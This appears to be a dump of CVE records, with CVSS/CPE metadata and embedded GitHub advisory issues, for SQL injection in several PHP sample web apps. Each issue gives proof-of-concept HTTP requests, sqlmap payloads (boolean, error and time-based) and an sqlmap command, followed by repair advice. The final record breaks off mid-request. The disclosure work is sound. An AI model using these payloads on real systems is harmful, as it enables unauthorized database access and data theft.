[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:job_portal:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "43FB0433-4530-4F0A-A88F-B017F5DD72F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "t4rrega", "cve" ]
# code-projects Job Portal Using PHP With Source Code v1.0 forget.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Job Portal Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/job-portal-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + forget.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/2f8a9538-3362-4a2b-b3e4-d9c8ad107737 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'forget.php' file of the 'Job Portal Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "email" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="785" alt="1" src="https://github.com/user-attachments/assets/e170002b-3112-4124-b29b-05496695a6e5"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "email" parameter, a serious SQL injection vulnerability has been discovered in the forget function of the "Job Portal Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /forget.php HTTP/1.1 Host: 192.168.0.102:1111 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: multipart/form-data; boundary=---------------------------232170428533661548972677865911 Content-Length: 667 Origin: http://192.168.0.102:1111 Connection: close Referer: http://192.168.0.102:1111/forget.php Upgrade-Insecure-Requests: 1 Priority: u=0, i -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="email" admin@admin.com -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="mobile" 9538553254 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="newpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="conpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="submit" submit -----------------------------232170428533661548972677865911-- ``` ## Vulnerability type: + time-based blind + boolean-based blind ## Vulnerability location: + 'email' parameter ## Payload: ``` Parameter: MULTIPART email ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="email" admin@admin.com' AND 3435=(SELECT (CASE WHEN (3435=3435) THEN 3435 ELSE (SELECT 9010 UNION SELECT 8042) END))-- - -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="mobile" 9538553254 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="newpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="conpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="submit" submit -----------------------------232170428533661548972677865911-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="email" admin@admin.com' AND (SELECT 6630 FROM (SELECT(SLEEP(5)))BNFF)-- AmoV -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="mobile" 9538553254 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="newpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="conpass" 123456 -----------------------------232170428533661548972677865911 Content-Disposition: form-data; name="submit" submit -----------------------------232170428533661548972677865911-- <img width="608" alt="2" src="https://github.com/user-attachments/assets/43bb13ac-e776-4269-9703-c6e152a03a47"> ``` ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="524" alt="3" src="https://github.com/user-attachments/assets/f9c81e38-56d7-4afc-8617-2eb1e624d0ac"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Job Portal Using PHP With Source Code v1.0 forget.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/1/comments
0
2024-08-25T13:41:13Z
2024-08-25T13:43:20Z
https://github.com/t4rrega/cve/issues/1
2,485,263,489
1
6,214
CVE-2024-8168
2024-08-26T15:15:09.857
A vulnerability was found in code-projects Online Bus Reservation Site 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument Username leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/t4rrega/cve/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275767" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275767" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.397715" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:online_bus_reservation_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "6370AED9-FA1C-4C5C-94A3-8DC8497337DD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "t4rrega", "cve" ]
# code-projects Online Bus Reservation Site Using PHP With Source Code v1.0 login.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Bus Reservation Site Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/online-bus-reservation-system-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + login.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/b607af24-c662-417c-9e6c-8240661b76bf # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'login.php' file of the 'Online Bus Reservation Site Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "Username" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="679" alt="1" src="https://github.com/user-attachments/assets/c0bf8f5d-abee-41fe-b36c-22bcf77412ac"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "Username" parameter, a serious SQL injection vulnerability has been discovered in the "Online Bus Reservation Site Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /login.php HTTP/1.1 Host: 192.168.0.102:1115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 47 Origin: http://192.168.0.102:1115 Connection: close Referer: http://192.168.0.102:1115/index4.php Upgrade-Insecure-Requests: 1 Priority: u=0, i Username=123123&Password=321321&submit=Continue ``` ## Vulnerability type: + time-based blind + boolean-based blind + error-based ## Vulnerability location: + 'Username' parameter ## Payload: ``` Parameter: Username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment) Payload: Username=123123' OR NOT 4225=4225#&Password=321321&submit=Continue Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: Username=123123' AND GTID_SUBSET(CONCAT(0x71786b7071,(SELECT (ELT(6195=6195,1))),0x7171766a71),6195)-- faLz&Password=321321&submit=Continue Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: Username=123123' AND (SELECT 8161 FROM (SELECT(SLEEP(5)))UUVQ)-- yMOI&Password=321321&submit=Continue ``` <img width="670" alt="2" src="https://github.com/user-attachments/assets/87b693a8-ca05-461f-a838-97a225c46d85"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="520" alt="3" src="https://github.com/user-attachments/assets/6b2b3551-b9d4-4afc-9d85-ab05707b0556"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Online Bus Reservation Site Using PHP With Source Code v1.0 login.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/2/comments
0
2024-08-25T13:45:59Z
2024-08-25T13:45:59Z
https://github.com/t4rrega/cve/issues/2
2,485,266,983
2
6,215
CVE-2024-8169
2024-08-26T15:15:10.123
A vulnerability was found in code-projects Online Quiz Site 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file signupuser.php. The manipulation of the argument lid leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 6.9, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "NONE", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://code-projects.org/" }, { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/t4rrega/cve/issues/5" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "VDB Entry" ], "url": "https://vuldb.com/?ctiid.275768" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?id.275768" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.397718" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:fabianros:online_quiz_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "15DF6E37-6F4D-459A-823E-73DB8450C6CC", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/5
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "t4rrega", "cve" ]
# code-projects Online Quiz Site Using PHP With Source Code v1.0 signupuser.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Online Quiz Site Using PHP With Source Code ## Vendor Homepage + https://code-projects.org/online-quiz-site-using-php-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + signupuser.php ## VERSION(S) + V1.0 ## Software Link + https://download.code-projects.org/details/67670413-e2f8-47a5-87b3-a6a9ecdf8885 # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'signupuser.php' file of the 'Online Quiz Site Using PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "lid " and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="900" alt="1" src="https://github.com/user-attachments/assets/181291cb-9a12-43b9-9d4e-8daa1aa1ca48"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input verification for the "lid " parameter, a serious SQL injection vulnerability has been discovered in the "Online Quiz Site Using PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to the database, modify or delete data, and access sensitive information without logging in. Immediate remedial measures are needed to ensure system security and protect data integrity. # No login verification required # Vulnerability details and POC ``` POST /signupuser.php HTTP/1.1 Host: 192.168.0.102:1214 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:129.0) Gecko/20100101 Firefox/129.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 116 Origin: http://192.168.0.102:1214 Connection: close Referer: http://192.168.0.102:1214/signup.php Cookie: PHPSESSID=ng2789oib9vsb0mictkp8o643v Upgrade-Insecure-Requests: 1 Priority: u=0, i lid=admin&pass=admin&cpass=admin&name=123&address=123&city=12312&phone=773452120&email=123123%40qq.com&Submit=Signup ``` ## Vulnerability type: + time-based blind ## Vulnerability location: + 'lid ' parameter ## Payload: ``` Parameter: lid (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: lid=admin' AND (SELECT 9033 FROM (SELECT(SLEEP(5)))xdud) AND 'iqqS'='iqqS&pass=admin&cpass=admin&name=123&address=123&city=12312&phone=773452120&email=123123@qq.com&Submit=Signup ``` <img width="392" alt="2" src="https://github.com/user-attachments/assets/2cd0394a-10e2-4cd8-89f7-6e56e649579f"> ## The following are screenshots of some specific information obtained from testing and running with the sqlmap tool: ```bash sqlmap -r 123 --batch --dbs ``` <img width="403" alt="3" src="https://github.com/user-attachments/assets/7940ddcf-eac7-422f-bb16-22fd0578a328"> # Suggested repair 1. **Use prepared statements and parameter binding:** Preparing statements can prevent SQL injection as they separate SQL code from user input data. When using prepare statements, the value entered by the user is treated as pure data and will not be interpreted as SQL code. 2. **Input validation and filtering:** Strictly validate and filter user input data to ensure it conforms to the expected format. 3. **Minimize database user permissions:** Ensure that the account used to connect to the database has the minimum necessary permissions. Avoid using accounts with advanced permissions (such as' root 'or' admin ') for daily operations. 4. **Regular security audits:** Regularly conduct code and system security audits to promptly identify and fix potential security vulnerabilities.
code-projects Online Quiz Site Using PHP With Source Code v1.0 signupuser.php SQL injection
https://api.github.com/repos/t4rrega/cve/issues/5/comments
0
2024-08-25T13:56:04Z
2024-08-25T13:56:04Z
https://github.com/t4rrega/cve/issues/5
2,485,274,271
5
6,216
CVE-2024-8171
2024-08-26T16:15:11.273
A vulnerability classified as critical was found in itsourcecode Tailoring Management System 1.0. This vulnerability affects unknown code of the file staffcatedit.php. The manipulation of the argument title leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "cna@vuldb.com", "type": "Secondary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": [ { "cvssData": { "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "Safety": "NOT_DEFINED", "attackComplexity": "LOW", "attackRequirements": "NONE", "attackVector": "NETWORK", "availabilityRequirement": "NOT_DEFINED", "baseScore": 5.3, "baseSeverity": "MEDIUM", "confidentialityRequirement": "NOT_DEFINED", "exploitMaturity": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "privilegesRequired": "LOW", "providerUrgency": "NOT_DEFINED", "subAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "userInteraction": "NONE", "valueDensity": "NOT_DEFINED", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "version": "4.0", "vulnAvailabilityImpact": "LOW", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnerabilityResponseEffort": "NOT_DEFINED" }, "source": "cna@vuldb.com", "type": "Secondary" } ] }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/t4rrega/cve/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Product" ], "url": "https://itsourcecode.com/" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?ctiid.275770" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required" ], "url": "https://vuldb.com/?id.275770" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory", "VDB Entry" ], "url": "https://vuldb.com/?submit.397720" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:angeljudesuarez:tailoring_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D6D27827-5554-4FAB-8460-52599930F4FF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/t4rrega/cve/issues/6
[ "Exploit", "Issue Tracking" ]
github.com
[ "t4rrega", "cve" ]
# Itsourcecode Tailoring Management System Project In PHP With Source Code v1.0 staffcatedit.php SQL injection # NAME OF AFFECTED PRODUCT(S) + Tailoring Management System Project In PHP With Source Code ## Vendor Homepage + https://itsourcecode.com/free-projects/php-project/tailoring-management-system-project-in-php-with-source-code/ # AFFECTED AND/OR FIXED VERSION(S) ## submitter + t4rrega ## Vulnerable File + staffcatedit.php ## VERSION(S) + V1.0 ## Software Link + https://itsourcecode.com/wp-content/uploads/2021/04/tailoring-management-system-project-in-php-with-source-code.zip # PROBLEM TYPE ## Vulnerability Type + SQL injection ## Root Cause + A SQL injection vulnerability was found in the 'staffcatedit.php' file of the 'Tailoring Management System Project In PHP With Source Code' project. The reason for this issue is that attackers inject malicious code from the parameter "title" and use it directly in SQL queries without appropriate cleaning or validation. This allows attackers to forge input values, thereby manipulating SQL queries and performing unauthorized operations. <img width="677" alt="1" src="https://github.com/user-attachments/assets/99320d67-4b96-471c-ba75-1404d74add96"> ## Impact + Attackers can exploit this SQL injection vulnerability to achieve unauthorized database access, sensitive data leakage, data tampering, comprehensive system control, and even service interruption, posing a serious threat to system security and business continuity. # DESCRIPTION + Due to insufficient user input validation for the "title" parameter, a serious SQL injection vulnerability has been discovered in the "Tailoring Management System Project in PHP With Source Code", allowing attackers to inject malicious SQL queries. Therefore, attackers can gain unauthorized access to databases, modify or delete data, and access sensitive information. Immediate remedial measures are needed to ensure system security and protect data integrity. # Vulnerability details and POC ``` POST /staffcatedit.php?id=6 HTTP/1.1 Host: 192.168.1.138:2223 Content-Length: 10 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.138:2223 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept: 